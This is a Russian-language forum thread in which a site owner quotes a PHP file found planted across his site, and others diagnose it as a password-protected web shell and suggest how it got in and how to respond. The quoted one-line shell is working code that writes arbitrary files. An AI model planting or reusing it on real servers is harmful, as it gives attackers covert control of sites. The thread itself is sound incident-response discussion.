Вирус на сайте?

Question

[slaventium]

Только что заметил, что на одном из сайтов, практически в каждом каталоге появились странные файлы с названием типа: image.php, include.php и т. д.

Вот типичное содержимое этих файлов:

<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>

Интересная штука получается, которая влечет за собой вопросы:

1. Как оно туда попало? Неужели дырявый сайт?
2. Какими последствиями это грозит? Понятно, что эти файлы я удалил, пароли поменял.

Comments

[Rafael Osipov]

Проверьте также свои html-формы на наличие дополнительных параметров, которые могли быть внедрены. Похоже на сбор какой-то статистики по информации от поступивших запросов, с записью в локальный файл.

Answer 1

[Игорь]

судя по приведённому коду файла, это некий php-shell.
Может создавать файлы и записывать туда данные

Как попало? На этот вопрос могут ответить логи: смотрите кто к этим файлам обращался и с какого IP. Далее ищите этот IP во всех логах. Самые распространённые варианты:

1. кто-то украл пароли доступа к сайту
2. уязвимость в сткриптах веб-сервиса позволяющая удалённый аплоад файлов
3. уязвимость в сткриптах веб-сервиса позволяющая удалённый аплоад файлов через обращение к БД

Answer 2

[Fyodor]

Самый простой способ — вирус крадет пароли от фтп и дальше уже закидывают вирус. бывают и более извращенные способы, в том числе со взломом сайта. Но через краденные пароли куда проще ведь. Фтп клиентом надо пользоваться таким, где пароли шифруются. ну и на вирусы проверить все компьютеры у кого доступ до внутренностей сайта есть.

Answer 3

[nochkin]

1. Если используются какие-то Open Source проекты на php, то есть смысл посмотреть в плане обновлении версий.
2. Может грозить тем, что злоумышленник получает полный доступ на сайт и файлы.

Answer 4

[Михаил Лялин]

1) причиной могло быть заражение компьютера админа и т.п.
2) поставьте на контроль через www.siteguard.ru/

Answer 5

[lubezniy]

Ещё вариант (имел место быть на VPS Мастерхоста) — заражение через дыру в старой версии Plesk и установка разных закладок в сайты, а потом уже свободное проведение таких фокусов.